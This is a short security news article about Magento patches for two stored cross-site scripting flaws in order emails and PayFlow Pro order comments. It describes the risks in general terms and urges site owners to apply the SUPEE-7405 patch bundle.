Magento update fixes critical XSS flaws

Magento has released new security patches designed to plug a number of critical XSS vulnerabilities.


In an update last week, the content management system released a bundle of new security updates which included patches for two critical issues.

The stored cross-site scripting (XSS) flaws are dangerous as they allow attackers to hijack Magento-based websites, escalate user privileges, steal client data and control the website via administrator accounts.

As Magento is an e-commerce management platform, this may also include the theft of sensitive customer data which can lead to issues including identity theft.

The first vulnerability, affecting almost every install of Magento CE and below, as well as Magento EE and prior versions, is a vulnerability which can be exploited remotely by attackers. All it takes to exploit the bug is for an email containing malicious Javascript code to be sent through the CMS platform.

Magento does not properly validate this email and executes it in an admin content when an order is viewed in Magento. The malicious code embedded within the email then is able to steal an administrator session.

Cybersecurity firm Sucuri says:

“The buggy snippet is located inside Magento core libraries, more specifically within the administrator’s backend. Unless you’re behind a WAF or you have a very heavily modified administration panel, you’re at risk.”

The second bug, also deemed critical, was discovered within the comments sections of the Magento CMS. According to the e-commerce platform, a “specifically crafted request” which relies upon the PayFlow Pro payment module can be appended to an order.

As Magento — once again — does not filter the request properly, JavaScript code then may end up being saved in the Magento database. If viewed server-side when an admin looks up an order, this code can then execute and also lead to session hijacking.

More security news

In the latest security update, Magento also fixes problems including RSS-based information leaks, weaknesses to brute-force attacks, a lack of form protection on the Admin Login page which enabled request forgery attacks and a denial of service issue in email delivery, among others.

In order to protect websites from exploitation, webmasters should apply the latest patch bundle SUPEE-7405 as soon as possible.

In September last year, researchers discovered a phishing campaign which targeted and managed to infect thousands of WordPress websites with the Nuclear Exploit kit.

Read on: Top picks